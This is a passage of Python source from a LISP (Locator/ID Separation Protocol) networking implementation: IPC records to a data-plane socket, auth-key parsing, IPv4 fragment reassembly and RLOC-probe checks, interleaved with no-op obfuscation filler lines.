    trailing ", " stripped, or "<eid-prefix> rloc native-forward" for a
    native-forward entry with no RLOCs.
    """
    if lisp_checkpoint_map_cache == False: return

    line = "{} rloc ".format(mc.eid.print_prefix())

    for rloc_entry in mc.rloc_set:
        if rloc_entry.rloc.is_null(): continue
        line += "{} {} {}, ".format(rloc_entry.rloc.print_address_no_iid(),
            rloc_entry.priority, rloc_entry.weight)

    if mc.rloc_set != []:
        # Strip the trailing ", " separator.
        line = line[0:-2]
    elif mc.action == LISP_NATIVE_FORWARD_ACTION:
        line += "native-forward"

    checkpoint_list.append(line)
    return
if 22 - 22: ooOoO0o . ooOoO0o * OOooOOo % OoOoOO00
if 51 - 51: OoOoOO00 . oO0o - OoOoOO00
if 79 - 79: iII111i
if 71 - 71: i1IIi / OoO0O00 / OOooOOo + I1Ii111
if 80 - 80: Oo0Ooo . iIii1I11I1II1 . OoooooooOO % iII111i . oO0o
if 10 - 10: i11iIiiIii * OoooooooOO . i11iIiiIii
if 35 - 35: OOooOOo * OOooOOo + o0oOOo0O0Ooo / i1IIi - I11i
def lisp_check_dp_socket():
    """Return True when the data-plane named socket exists on disk.

    Logs and returns False when the socket path is missing.
    """
    socket_name = lisp_ipc_dp_socket_name
    if os.path.exists(socket_name): return True

    lprint("Socket '{}' {}".format(socket_name, bold("does not exist",
        False)))
    return False
if 18 - 18: Ii1I . I1Ii111 % OoooooooOO + OoooooooOO - I1IiiI % I1IiiI
if 51 - 51: iIii1I11I1II1 / I1IiiI
if 27 - 27: O0 . o0oOOo0O0Ooo / ooOoO0o / OoooooooOO % Ii1I
if 27 - 27: ooOoO0o / IiII + OoO0O00 + Ii1I % I1Ii111
if 86 - 86: O0 % i11iIiiIii - Ii1I * oO0o % OOooOOo * i1IIi
if 87 - 87: II111iiii
if 53 - 53: OoOoOO00 * i11iIiiIii / I1Ii111
def lisp_write_to_dp_socket(entry):
    """JSON-encode 'entry' and send it on the data-plane named socket.

    Best-effort: failures are logged and swallowed.

    Fix: 'record' is initialized before the try block.  In the original,
    a failure inside json.dumps() left the local unbound, so the except
    handler itself raised NameError instead of logging the failure.
    """
    record = None
    try:
        record = json.dumps(entry)
        write = bold("Write IPC", False)
        lprint("{} record to named socket: '{}'".format(write, record))
        lisp_ipc_dp_socket.sendto(record, lisp_ipc_dp_socket_name)
    except:
        lprint("Failed to write IPC record to named socket: '{}'".format(
            record))
    return
if 2 - 2: IiII - i1IIi * IiII % O0 / Ii1I
if 64 - 64: iII111i - Oo0Ooo
if 73 - 73: iIii1I11I1II1 * I1Ii111 * OoO0O00
if 68 - 68: ooOoO0o * Ii1I / I1ii11iIi11i * OoooooooOO + OoooooooOO . OoooooooOO
if 50 - 50: I1IiiI % o0oOOo0O0Ooo
if 1 - 1: II111iiii
if 22 - 22: I1Ii111 + iII111i
if 50 - 50: iII111i % OoOoOO00 - II111iiii + II111iiii / OoO0O00
if 69 - 69: Ii1I * II111iiii
def lisp_write_ipc_keys(rloc):
    """Re-announce map-cache entries that use 'rloc' over the IPC socket.

    The RLOC-probe list is keyed by "<addr>" or "<addr>:<port>" when the
    RLOC has a translated port; every map-cache entry hanging off that
    key is rewritten so the data-plane learns the current keys.
    """
    address = rloc.rloc.print_address_no_iid()
    port = rloc.translated_port
    if port != 0: address += ":" + str(port)
    if (address in lisp_rloc_probe_list) == False: return

    for unused_rloc, eid, unused_group in lisp_rloc_probe_list[address]:
        mc = lisp_map_cache.lookup_cache(eid, True)
        if mc == None: continue
        lisp_write_ipc_map_cache(True, mc)
    return
if 68 - 68: ooOoO0o * i11iIiiIii * OOooOOo % iII111i
if 10 - 10: Ii1I / Oo0Ooo - i1IIi
if 11 - 11: I11i * iII111i
if 28 - 28: II111iiii + IiII / Oo0Ooo * I1IiiI - OOooOOo
if 2 - 2: oO0o + I11i / I1Ii111 . I11i
if 59 - 59: Ii1I
if 47 - 47: iII111i % iII111i
def lisp_write_ipc_map_cache(add_or_delete, mc, dont_send=False):
    """Build (and optionally send) a map-cache IPC record for 'mc'.

    'add_or_delete' True means opcode "add", False "delete".  Multicast
    entries ship an "rles" array built from the first RLOC's RLE
    forwarding list; unicast entries ship an "rlocs" array of up, IPv4
    or IPv6 RLOCs.  Returns the record dictionary; when 'dont_send' is
    False it is also written to the data-plane socket.  ITR/RTR only.
    """
    if lisp_i_am_etr: return
    if lisp_ipc_dp_socket == None: return
    if lisp_check_dp_socket() == False: return

    opcode = "add" if add_or_delete else "delete"
    record = {"type": "map-cache", "opcode": opcode}

    multicast = (mc.group.is_null() == False)
    if multicast:
        record["eid-prefix"] = mc.group.print_prefix_no_iid()
        record["rles"] = []
    else:
        record["eid-prefix"] = mc.eid.print_prefix_no_iid()
        record["rlocs"] = []
    record["instance-id"] = str(mc.eid.instance_id)

    if multicast:
        if len(mc.rloc_set) >= 1 and mc.rloc_set[0].rle:
            for rle_node in mc.rloc_set[0].rle.rle_forwarding_list:
                address = rle_node.address.print_address_no_iid()
                port = str(4341) if rle_node.translated_port == 0 else \
                    str(rle_node.translated_port)

                rle = {"rle": address, "port": port}
                ekey, ikey = rle_node.get_encap_keys()
                rle = lisp_build_json_keys(rle, ekey, ikey, "encrypt-key")
                record["rles"].append(rle)
    else:
        for rloc_entry in mc.rloc_set:
            is_v4 = rloc_entry.rloc.is_ipv4()
            is_v6 = rloc_entry.rloc.is_ipv6()
            if is_v4 == False and is_v6 == False: continue
            if rloc_entry.up_state() == False: continue

            port = str(4341) if rloc_entry.translated_port == 0 else \
                str(rloc_entry.translated_port)

            rloc = {"rloc": rloc_entry.rloc.print_address_no_iid(),
                "priority": str(rloc_entry.priority),
                "weight": str(rloc_entry.weight), "port": port}
            ekey, ikey = rloc_entry.get_encap_keys()
            rloc = lisp_build_json_keys(rloc, ekey, ikey, "encrypt-key")
            record["rlocs"].append(rloc)

    if dont_send == False: lisp_write_to_dp_socket(record)
    return record
if 40 - 40: II111iiii
if 13 - 13: OoOoOO00
if 23 - 23: Oo0Ooo / II111iiii % OOooOOo % iII111i - Oo0Ooo / OoO0O00
if 7 - 7: Ii1I / I11i / II111iiii % I11i * I11i + iIii1I11I1II1
if 6 - 6: iIii1I11I1II1 * oO0o - iIii1I11I1II1 . O0 . O0
if 96 - 96: I1Ii111 * II111iiii % i11iIiiIii - oO0o
if 32 - 32: i11iIiiIii * o0oOOo0O0Ooo . OoooooooOO / O0
def lisp_write_ipc_decap_key(rloc_addr, keys):
    """Send the decryption keys for 'rloc_addr' to the data-plane.

    'rloc_addr' is "<addr>" or "<addr>:<port>"; 'keys' is the key array
    whose slot 1 carries the active crypto-key object.  ETR/RTR only.
    """
    if lisp_i_am_itr: return
    if lisp_ipc_dp_socket == None: return
    if lisp_check_dp_socket() == False: return

    # Nothing to announce without an active key in slot 1.
    if keys == None or len(keys) == 0 or keys[1] == None: return

    ekey = keys[1].encrypt_key
    ikey = keys[1].icv_key

    addr_and_port = rloc_addr.split(":")
    if len(addr_and_port) == 1:
        record = {"type": "decap-keys", "rloc": addr_and_port[0]}
    else:
        record = {"type": "decap-keys", "rloc": addr_and_port[0],
            "port": addr_and_port[1]}

    record = lisp_build_json_keys(record, ekey, ikey, "decrypt-key")
    lisp_write_to_dp_socket(record)
    return
if 74 - 74: i11iIiiIii - oO0o % II111iiii . iIii1I11I1II1
if 94 - 94: OOooOOo + oO0o / OoooooooOO + o0oOOo0O0Ooo - o0oOOo0O0Ooo . OOooOOo
if 15 - 15: i11iIiiIii * O0 % iIii1I11I1II1 . OoooooooOO % oO0o + o0oOOo0O0Ooo
if 37 - 37: oO0o + O0 . IiII * I1ii11iIi11i
if 2 - 2: O0 . ooOoO0o
if 97 - 97: i1IIi . Oo0Ooo
if 81 - 81: OoOoOO00
if 81 - 81: O0
def lisp_build_json_keys(entry, ekey, ikey, key_type):
    """Attach a one-element "keys" array to IPC record 'entry'.

    'key_type' names the encryption-key field ("encrypt-key" or
    "decrypt-key"); 'ikey' fills "icv-key".  When 'ekey' is None the
    entry is returned unchanged.  Mutates and returns 'entry'.
    """
    if ekey == None: return entry

    entry["keys"] = [{"key-id": "1", key_type: ekey, "icv-key": ikey}]
    return entry
if 68 - 68: iII111i
if 59 - 59: O0 - i11iIiiIii + OoooooooOO - iII111i - Oo0Ooo . OoooooooOO
if 60 - 60: O0 * iIii1I11I1II1 - Ii1I * II111iiii . ooOoO0o
if 61 - 61: I1IiiI . iII111i
if 19 - 19: iIii1I11I1II1 * Oo0Ooo - I1IiiI - I1IiiI + O0 - I1Ii111
if 56 - 56: I1Ii111 - i1IIi + I11i . i1IIi / II111iiii * oO0o
if 70 - 70: ooOoO0o - II111iiii . I11i
def lisp_write_ipc_database_mappings(ephem_port):
    """Send the database-mappings and ETR NAT port to the data-plane.

    Only IPv4/IPv6 EID database entries are announced; a second record
    carries 'ephem_port', the ephemeral NAT port the ETR listens on.
    ETR only.
    """
    if lisp_i_am_etr == False: return
    if lisp_ipc_dp_socket == None: return
    if lisp_check_dp_socket() == False: return

    record = {"type": "database-mappings", "database-mappings": []}

    for db in lisp_db_list:
        if db.eid.is_ipv4() == False and db.eid.is_ipv6() == False: continue
        record["database-mappings"].append(
            {"instance-id": str(db.eid.instance_id),
             "eid-prefix": db.eid.print_prefix_no_iid()})

    lisp_write_to_dp_socket(record)

    # Tell the data-plane which ephemeral port NAT traversal uses.
    record = {"type": "etr-nat-port", "port": ephem_port}
    lisp_write_to_dp_socket(record)
    return
if 25 - 25: iII111i / oO0o
if 61 - 61: OoooooooOO . Ii1I . I11i + oO0o
if 73 - 73: II111iiii % i11iIiiIii * I1ii11iIi11i + O0
if 61 - 61: I1IiiI / OOooOOo
if 67 - 67: OoOoOO00
if 22 - 22: Ii1I * I1ii11iIi11i * o0oOOo0O0Ooo - I1IiiI . i11iIiiIii
if 30 - 30: O0 / oO0o * i11iIiiIii + iIii1I11I1II1 + O0 % I1IiiI
def lisp_write_ipc_interfaces():
    """Send the interface-to-instance-id table to the data-plane.

    Interfaces with no configured instance-id are skipped.  ITR/RTR
    only.
    """
    if lisp_i_am_etr: return
    if lisp_ipc_dp_socket == None: return
    if lisp_check_dp_socket() == False: return

    record = {"type": "interfaces", "interfaces": []}

    for interface in lisp_myinterfaces.values():
        if interface.instance_id == None: continue
        record["interfaces"].append(
            {"interface": interface.device,
             "instance-id": str(interface.instance_id)})

    lisp_write_to_dp_socket(record)
    return
if 96 - 96: Ii1I
if 90 - 90: II111iiii
if 93 - 93: i11iIiiIii / Ii1I * Oo0Ooo . iII111i % iII111i / IiII
if 15 - 15: OoOoOO00 % I1Ii111 - iIii1I11I1II1
if 52 - 52: i11iIiiIii * ooOoO0o
if 15 - 15: OoooooooOO . oO0o . i11iIiiIii / o0oOOo0O0Ooo
if 91 - 91: ooOoO0o
if 47 - 47: II111iiii + I11i + ooOoO0o % Oo0Ooo / iII111i
if 9 - 9: O0 + IiII
if 69 - 69: I1IiiI
if 11 - 11: I11i % I1Ii111 + O0 . Ii1I . I1ii11iIi11i % I1Ii111
if 28 - 28: IiII . o0oOOo0O0Ooo + iII111i - OoOoOO00 / OOooOOo
if 86 - 86: ooOoO0o * OoOoOO00 + oO0o / II111iiii % OOooOOo
if 89 - 89: O0 * Ii1I / OoO0O00 / OoOoOO00 % iII111i * iIii1I11I1II1
def lisp_parse_auth_key(value):
    """Parse an authentication-key configuration string.

    A plain string (no "[n]" key-id prefixes) maps to {0: value}.  A
    string of the form "[1]key1[2]key2" maps each numeric key-id to its
    key text.  Returns None when a key-id is not an integer.
    """
    tokens = value.split("[")
    if len(tokens) == 1:
        return {0: value}

    auth_keys = {}
    for token in tokens:
        if token == "": continue

        close = token.find("]")
        key_id = token[0:close]
        try:
            key_id = int(key_id)
        except:
            return

        auth_keys[key_id] = token[close + 1::]
    return auth_keys
if 34 - 34: ooOoO0o + oO0o + II111iiii . I1Ii111 . i1IIi
if 14 - 14: OoO0O00 . ooOoO0o - i1IIi * I1IiiI
if 24 - 24: iIii1I11I1II1 / I1Ii111
if 16 - 16: OoOoOO00 * I1Ii111 - I1IiiI / I1Ii111
if 64 - 64: I1ii11iIi11i . i1IIi % II111iiii % Oo0Ooo + oO0o - I1IiiI
if 24 - 24: IiII . II111iiii . II111iiii . OoOoOO00 . i11iIiiIii
if 11 - 11: Ii1I
if 82 - 82: I11i - i1IIi . Oo0Ooo * I1Ii111
if 44 - 44: iII111i
if 56 - 56: II111iiii / Oo0Ooo % IiII * II111iiii - iIii1I11I1II1 + ooOoO0o
if 33 - 33: o0oOOo0O0Ooo . I11i / I1IiiI
if 29 - 29: o0oOOo0O0Ooo - ooOoO0o
if 59 - 59: I11i / IiII * OoO0O00 / IiII . I1Ii111
if 82 - 82: OOooOOo . iIii1I11I1II1 + I1Ii111
if 14 - 14: IiII . i11iIiiIii
if 17 - 17: ooOoO0o % ooOoO0o * oO0o
def lisp_reassemble ( packet ) :
 """Reassemble IPv4 fragments of a LISP encapsulated datagram.

 'packet' is a raw IPv4 packet including its header.  Returns the
 packet untouched when it is not a fragment, None while fragments are
 still outstanding (or when the fragments are not LISP encapsulated),
 and the fully reassembled packet with a rewritten, re-checksummed IPv4
 header once the last piece has arrived.  Fragments are queued per
 IPv4 ident in the global lisp_reassembly_queue.
 """
 # IPv4 flags/fragment-offset field, bytes 6-7 of the header.
 iIIi1 = socket . ntohs ( struct . unpack ( "H" , packet [ 6 : 8 ] ) [ 0 ] )
 if 8 - 8: ooOoO0o + OoO0O00 . II111iiii / iIii1I11I1II1 - OOooOOo
 if 87 - 87: iIii1I11I1II1 . IiII % I1IiiI . OoO0O00 - I1Ii111
 if 53 - 53: I1Ii111 % i11iIiiIii
 if 99 - 99: I1IiiI - i1IIi * i11iIiiIii + OoO0O00
 # Not a fragment: offset 0 with no MF bit, or only the DF bit set.
 if ( iIIi1 == 0 or iIIi1 == 0x4000 ) : return ( packet )
 if 80 - 80: o0oOOo0O0Ooo . I11i % iIii1I11I1II1 + OoOoOO00
 if 87 - 87: I1Ii111 + II111iiii / I1ii11iIi11i + OoOoOO00
 if 71 - 71: I1IiiI + iIii1I11I1II1 + O0 * iII111i % IiII
 if 42 - 42: OOooOOo - I1ii11iIi11i
 # IPv4 ident (queue key) and total-length fields.
 OOoOo = socket . ntohs ( struct . unpack ( "H" , packet [ 4 : 6 ] ) [ 0 ] )
 O000o0 = socket . ntohs ( struct . unpack ( "H" , packet [ 2 : 4 ] ) [ 0 ] )
 if 82 - 82: OOooOOo . Oo0Ooo * ooOoO0o % II111iiii % II111iiii - oO0o
 # True only for the LAST fragment: MF clear and a non-zero offset.
 OoooOOOOO0 = ( iIIi1 & 0x2000 == 0 and ( iIIi1 & 0x1fff ) != 0 )
 # Queue element: [byte-offset, payload-length, packet, is-last-frag].
 iIiiiIIiii = [ ( iIIi1 & 0x1fff ) * 8 , O000o0 - 20 , packet , OoooOOOOO0 ]
 if 36 - 36: O0 / I1ii11iIi11i + iII111i * Oo0Ooo
 if 97 - 97: IiII * O0 - o0oOOo0O0Ooo
 if 77 - 77: II111iiii / I11i % OoooooooOO % I1IiiI % II111iiii
 if 99 - 99: Oo0Ooo
 if 30 - 30: OoOoOO00 + I1Ii111 . OoOoOO00 - I11i
 if 42 - 42: OoOoOO00
 if 77 - 77: Oo0Ooo * IiII * I1ii11iIi11i + IiII
 if 37 - 37: IiII . OoooooooOO - i11iIiiIii * I1ii11iIi11i - OOooOOo
 # First fragment (offset 0, MF set): peek at the UDP ports to decide
 # whether this datagram is LISP encapsulated at all.  If not, mark the
 # queue entry with packet None so later fragments are dropped too.
 if ( iIIi1 == 0x2000 ) :
  O0o0oOOO , IIi11 = struct . unpack ( "HH" , packet [ 20 : 24 ] )
  O0o0oOOO = socket . ntohs ( O0o0oOOO )
  IIi11 = socket . ntohs ( IIi11 )
  # Accept LISP data (4341), VXLAN-GPE (8472), VXLAN (4789) dest ports
  # or LISP data source port; anything else is not for us.
  if ( IIi11 not in [ 4341 , 8472 , 4789 ] and O0o0oOOO != 4341 ) :
   lisp_reassembly_queue [ OOoOo ] = [ ]
   iIiiiIIiii [ 2 ] = None
 if 74 - 74: Ii1I + i11iIiiIii * iII111i / o0oOOo0O0Ooo . i11iIiiIii
 if 99 - 99: OOooOOo - OoooooooOO + OoooooooOO . OOooOOo
 if 37 - 37: IiII - iIii1I11I1II1 * i11iIiiIii . ooOoO0o
 if 78 - 78: OOooOOo - I1ii11iIi11i + iII111i % OoOoOO00
 if 28 - 28: I11i + i1IIi / i11iIiiIii * OOooOOo * II111iiii
 if 78 - 78: OoO0O00 - i1IIi % I1Ii111
 # Create the per-ident queue on first sight of this datagram.
 if ( lisp_reassembly_queue . has_key ( OOoOo ) == False ) :
  lisp_reassembly_queue [ OOoOo ] = [ ]
 if 87 - 87: I11i
 if 37 - 37: iII111i . I1Ii111 - iII111i - I11i - iIii1I11I1II1 - II111iiii
 if 80 - 80: I1Ii111 % O0 - IiII / II111iiii + i1IIi
 if 4 - 4: OOooOOo + II111iiii
 if 1 - 1: OoooooooOO * I1Ii111 - I11i / IiII
 iiiI1IIi111i = lisp_reassembly_queue [ OOoOo ]
 if 60 - 60: iIii1I11I1II1 . o0oOOo0O0Ooo . IiII
 if 66 - 66: OoooooooOO - I11i % i11iIiiIii / OoO0O00
 if 34 - 34: O0 * iIii1I11I1II1 . o0oOOo0O0Ooo . I1Ii111 . iIii1I11I1II1 * iIii1I11I1II1
 if 38 - 38: iIii1I11I1II1
 if 83 - 83: iII111i - Ii1I . oO0o - I1Ii111 * o0oOOo0O0Ooo
 # Queue already marked non-LISP (single None sentinel): drop fragment.
 if ( len ( iiiI1IIi111i ) == 1 and iiiI1IIi111i [ 0 ] [ 2 ] == None ) :
  dprint ( "Drop non-LISP encapsulated fragment 0x{}" . format ( lisp_hex_string ( OOoOo ) . zfill ( 4 ) ) )
  if 70 - 70: i11iIiiIii - OoO0O00 / i11iIiiIii
  return ( None )
 if 46 - 46: II111iiii + O0 * OoooooooOO
 if 39 - 39: OoooooooOO % II111iiii . o0oOOo0O0Ooo
 if 29 - 29: I11i . o0oOOo0O0Ooo . i1IIi . o0oOOo0O0Ooo
 if 77 - 77: iIii1I11I1II1 + iIii1I11I1II1
 if 52 - 52: I1ii11iIi11i - IiII % I1IiiI % i1IIi
 # Queue this fragment (mutates the shared list), then work on a copy
 # sorted by byte offset.
 iiiI1IIi111i . append ( iIiiiIIiii )
 iiiI1IIi111i = sorted ( iiiI1IIi111i )
 if 98 - 98: I1Ii111 + II111iiii % OoO0O00 % iII111i
 if 54 - 54: II111iiii . ooOoO0o . iII111i - I1IiiI
 if 97 - 97: oO0o - O0 / II111iiii * II111iiii - oO0o * IiII
 if 97 - 97: IiII % OoO0O00 . OoOoOO00 - Ii1I
 # Format source/destination RLOCs of this fragment for logging.
 O0o00o000oO = lisp_address ( LISP_AFI_IPV4 , "" , 32 , 0 )
 O0o00o000oO . address = socket . ntohl ( struct . unpack ( "I" , packet [ 12 : 16 ] ) [ 0 ] )
 IiIiI1I1iii = O0o00o000oO . print_address_no_iid ( )
 O0o00o000oO . address = socket . ntohl ( struct . unpack ( "I" , packet [ 16 : 20 ] ) [ 0 ] )
 IIIIIII1IiIii = O0o00o000oO . print_address_no_iid ( )
 O0o00o000oO = red ( "{} -> {}" . format ( IiIiI1I1iii , IIIIIII1IiIii ) , False )
 if 100 - 100: oO0o . ooOoO0o
 dprint ( "{}{} fragment, RLOCs: {}, packet 0x{}, frag-offset: 0x{}" . format ( bold ( "Received" , False ) , " non-LISP encapsulated" if iIiiiIIiii [ 2 ] == None else "" , O0o00o000oO , lisp_hex_string ( OOoOo ) . zfill ( 4 ) ,
# IiII
# II111iiii . I1IiiI % iIii1I11I1II1
 lisp_hex_string ( iIIi1 ) . zfill ( 4 ) ) )
 if 72 - 72: iIii1I11I1II1 - I1IiiI * OoO0O00 * o0oOOo0O0Ooo - I1IiiI . I1ii11iIi11i
 if 46 - 46: i1IIi . OoOoOO00 . I1Ii111
 if 84 - 84: OoOoOO00 * OoOoOO00 % o0oOOo0O0Ooo * II111iiii
 if 28 - 28: ooOoO0o % OoOoOO00 + ooOoO0o
 if 68 - 68: II111iiii
 # Incomplete: first fragment missing or last fragment not yet seen.
 if ( iiiI1IIi111i [ 0 ] [ 0 ] != 0 or iiiI1IIi111i [ - 1 ] [ 3 ] == False ) : return ( None )
 # Verify the offsets are contiguous (offset + length chains exactly).
 O0O0o0O00O = iiiI1IIi111i [ 0 ]
 for Iii1I in iiiI1IIi111i [ 1 : : ] :
  iIIi1 = Iii1I [ 0 ]
  o0Oo0O , III1i = O0O0o0O00O [ 0 ] , O0O0o0O00O [ 1 ]
  if ( o0Oo0O + III1i != iIIi1 ) : return ( None )
  O0O0o0O00O = Iii1I
 if 64 - 64: I1ii11iIi11i * II111iiii % oO0o % Oo0Ooo * OoOoOO00 * iIii1I11I1II1
 # All fragments present and contiguous; retire the queue entry.
 lisp_reassembly_queue . pop ( OOoOo )
 if 41 - 41: OoO0O00 . I11i % OoO0O00
 if 13 - 13: I1ii11iIi11i + II111iiii . OOooOOo . ooOoO0o - IiII % O0
 if 69 - 69: Oo0Ooo / ooOoO0o * i11iIiiIii
 if 11 - 11: OoOoOO00 * OoooooooOO
 if 40 - 40: iIii1I11I1II1
 # Concatenate: first fragment keeps its IP header, the rest contribute
 # payload only (strip their 20-byte headers).
 packet = iiiI1IIi111i [ 0 ] [ 2 ]
 for Iii1I in iiiI1IIi111i [ 1 : : ] : packet += Iii1I [ 2 ] [ 20 : : ]
 if 46 - 46: II111iiii
 dprint ( "{} fragments arrived for packet 0x{}, length {}" . format ( bold ( "All" , False ) , lisp_hex_string ( OOoOo ) . zfill ( 4 ) , len ( packet ) ) )
 if 24 - 24: OOooOOo % OOooOOo * iII111i . Oo0Ooo * OOooOOo
 if 52 - 52: I11i
 if 46 - 46: Oo0Ooo % oO0o - I1IiiI + Ii1I
 if 54 - 54: OoOoOO00 / ooOoO0o - I1IiiI
 if 37 - 37: o0oOOo0O0Ooo
 # Rebuild the IPv4 header: new total length, clear ident and fragment
 # fields, zero the checksum, then recompute it.
 iI1 = socket . htons ( len ( packet ) )
 iIIIIII = packet [ 0 : 2 ] + struct . pack ( "H" , iI1 ) + packet [ 4 : 6 ] + struct . pack ( "H" , 0 ) + packet [ 8 : 10 ] + struct . pack ( "H" , 0 ) + packet [ 12 : 20 ]
 if 57 - 57: iII111i / i1IIi / i1IIi + IiII
 if 75 - 75: IiII / O0
 iIIIIII = lisp_ip_checksum ( iIIIIII )
 return ( iIIIIII + packet [ 20 : : ] )
if 72 - 72: I11i
if 35 - 35: I11i % OoooooooOO / i1IIi * i1IIi / I1IiiI
if 42 - 42: I11i - i1IIi - oO0o / I11i + Ii1I + ooOoO0o
if 23 - 23: OoOoOO00 . oO0o - iII111i
if 27 - 27: Oo0Ooo * OOooOOo - OoOoOO00
if 1 - 1: II111iiii * i11iIiiIii . OoooooooOO
if 37 - 37: OoooooooOO + O0 . I11i % OoOoOO00
if 57 - 57: I1Ii111 . OOooOOo + I1Ii111 . iIii1I11I1II1 / oO0o / O0
def lisp_get_crypto_decap_lookup_key(addr, port):
    """Return the decap crypto-key dict key for 'addr'/'port', or None.

    Tries "<addr>:<port>" first, then plain "<addr>".  As a last resort
    it scans the decap key table for an entry whose address part matches
    'addr' (any port) and, when found, aliases it under plain "<addr>"
    before returning that key.
    """
    addr_string = addr.print_address_no_iid() + ":" + str(port)
    if addr_string in lisp_crypto_keys_by_rloc_decap: return addr_string

    addr_string = addr.print_address_no_iid()
    if addr_string in lisp_crypto_keys_by_rloc_decap: return addr_string

    # Scan for an addr:port entry whose address part matches; IPv6
    # addresses contain colons, so rejoin all but the last element.
    for key in lisp_crypto_keys_by_rloc_decap:
        parts = key.split(":")
        if len(parts) == 1: continue
        base = parts[0] if len(parts) == 2 else ":".join(parts[0:-1])
        if base == addr_string:
            keys = lisp_crypto_keys_by_rloc_decap[key]
            lisp_crypto_keys_by_rloc_decap[addr_string] = keys
            return addr_string

    return None
if 47 - 47: iII111i / OOooOOo + iII111i
if 69 - 69: I1IiiI . I1ii11iIi11i
if 18 - 18: I11i * I1IiiI
if 42 - 42: i1IIi . I1Ii111 - ooOoO0o + I11i / oO0o
if 60 - 60: i1IIi + OoooooooOO % i11iIiiIii / IiII % Oo0Ooo + I1IiiI
if 87 - 87: Ii1I % OoooooooOO % I1Ii111 * i11iIiiIii * OoOoOO00
if 78 - 78: I11i
if 62 - 62: iIii1I11I1II1 . o0oOOo0O0Ooo . ooOoO0o % oO0o % O0 % oO0o
if 51 - 51: Oo0Ooo / IiII - Oo0Ooo
if 71 - 71: I11i * I1ii11iIi11i * OOooOOo * o0oOOo0O0Ooo
if 53 - 53: I1IiiI % I1IiiI
def lisp_build_crypto_decap_lookup_key(addr, port):
    """Choose the decap crypto-key dict key for a peer 'addr'/'port'.

    Non-RTR nodes always key by "<addr>:<port>".  An RTR keys an xTR
    behind a NAT by "<addr>:<port>" (found in the NAT state table) and
    everything else by plain "<addr>".
    """
    addr = addr.print_address_no_iid()
    addr_and_port = addr + ":" + str(port)

    if lisp_i_am_rtr:
        if addr in lisp_rloc_probe_list: return addr

        # NATed xTRs need the port to disambiguate multiple xTRs behind
        # the same NAT address.
        for nat_info in lisp_nat_state_info.values():
            for info in nat_info:
                if addr == info.address: return addr_and_port
        return addr

    return addr_and_port
if 82 - 82: iIii1I11I1II1 . OOooOOo
if 7 - 7: i11iIiiIii . I11i
if 56 - 56: iIii1I11I1II1 - II111iiii * i1IIi / Ii1I
if 65 - 65: OOooOOo / I1IiiI . OoooooooOO + I1IiiI + OoooooooOO + i11iIiiIii
if 20 - 20: I1IiiI + iII111i + O0 * O0
if 18 - 18: I11i - I11i . OoOoOO00 . ooOoO0o
if 31 - 31: ooOoO0o
def lisp_set_ttl(lisp_socket, ttl):
    """
    Set the outer IPv4 TTL on 'lisp_socket' to 'ttl'. Best-effort: on
    platforms where the option (or the SOL_IP/IP_TTL constants) is not
    available, log and carry on rather than fail the caller.
    """
    try:
        lisp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, ttl)
    except (socket.error, OSError, AttributeError):
        # AttributeError covers platforms whose socket module does not
        # define SOL_IP/IP_TTL; socket.error/OSError covers kernels that
        # reject the option. Deliberately best-effort -- do not raise.
        lprint("socket.setsockopt(IP_TTL) not supported")
    return
if 19 - 19: ooOoO0o + I1ii11iIi11i - ooOoO0o
if 17 - 17: I11i * i1IIi + iIii1I11I1II1 % I1IiiI
if 44 - 44: IiII + I1IiiI . Ii1I % Oo0Ooo
if 97 - 97: O0
if 95 - 95: OoO0O00 % iII111i / I1IiiI * OoooooooOO
if 31 - 31: iIii1I11I1II1
if 62 - 62: o0oOOo0O0Ooo - iII111i / II111iiii . o0oOOo0O0Ooo
def lisp_is_rloc_probe_request(lisp_type):
    """
    Return True when the single LISP header byte 'lisp_type' equals
    0x12, i.e. message type 1 (Map-Request) with the probe bit set
    (RFC 6830 control-message encoding).
    """
    (type_byte,) = struct.unpack("B", lisp_type)
    return(type_byte == 0x12)
if 20 - 20: iIii1I11I1II1 % OOooOOo
if 91 - 91: ooOoO0o
if 96 - 96: I1IiiI . OOooOOo
if 94 - 94: OoooooooOO + II111iiii % ooOoO0o - II111iiii / O0
if 34 - 34: IiII % oO0o
if 54 - 54: I1IiiI
if 80 - 80: OoOoOO00 . I1IiiI / I1ii11iIi11i . iII111i
def lisp_is_rloc_probe_reply(lisp_type):
    """
    Return True when the single LISP header byte 'lisp_type' equals
    0x28, i.e. message type 2 (Map-Reply) with the probe bit set
    (RFC 6830 control-message encoding).
    """
    (type_byte,) = struct.unpack("B", lisp_type)
    return(type_byte == 0x28)
if 31 - 31: I11i * o0oOOo0O0Ooo
if 17 - 17: Ii1I * iIii1I11I1II1
if 9 - 9: o0oOOo0O0Ooo - IiII
if 78 - 78: i11iIiiIii . o0oOOo0O0Ooo
if 72 - 72: Oo0Ooo % II111iiii + O0 * OoOoOO00 - OOooOOo + I1Ii111
if 23 - 23: I1IiiI - O0 - iII111i . II111iiii / oO0o
if 1 - 1: I11i . OOooOOo / oO0o % I11i * Oo0Ooo + Oo0Ooo
if 23 - 23: Ii1I % i1IIi - I1Ii111
if 95 - 95: OoOoOO00 - ooOoO0o . i1IIi . OoooooooOO
if 38 - 38: I1IiiI + I1ii11iIi11i - Oo0Ooo . i11iIiiIii - i1IIi
if 11 - 11: IiII / I1IiiI . I1IiiI
if 87 - 87: OoooooooOO * OoO0O00 * iIii1I11I1II1
if 16 - 16: o0oOOo0O0Ooo * I11i + OoooooooOO + O0 / iIii1I11I1II1
if 60 - 60: Ii1I % IiII * OoooooooOO * ooOoO0o * Ii1I
if 8 - 8: I1Ii111 - o0oOOo0O0Ooo
if 52 - 52: OoOoOO00 % O0 + I1ii11iIi11i . i11iIiiIii
if 59 - 59: Ii1I - I1Ii111 . ooOoO0o - OoOoOO00 + oO0o . OoO0O00
if 88 - 88: OOooOOo - ooOoO0o * o0oOOo0O0Ooo . OoooooooOO
if 3 - 3: I1Ii111
def lisp_is_rloc_probe(packet, rr):
    """
    Examine a pcap-captured IPv4 packet and decide whether it is a LISP
    RLOC-probe Map-Request/Map-Reply to or from the LISP control port.

    'rr' selects what to accept: 0 = probe requests only, 1 = probe
    replies only, -1 = either.

    Returns [payload, source, port, ttl] with the outer IPv4/UDP
    headers stripped, [packet, None, None, None] when the packet is not
    an RLOC-probe, or [None, None, None, None] when the probe was
    sourced by a local address (our own probe looping back).

    Assumes 'packet' begins with a 20-byte IPv4 header (no IP options)
    -- TODO confirm the capture filter guarantees this.
    """
    # Must be UDP: IPv4 protocol field at byte offset 9 equals 17.
    O0OO0ooO00 = (struct.unpack("B", packet[9])[0] == 17)
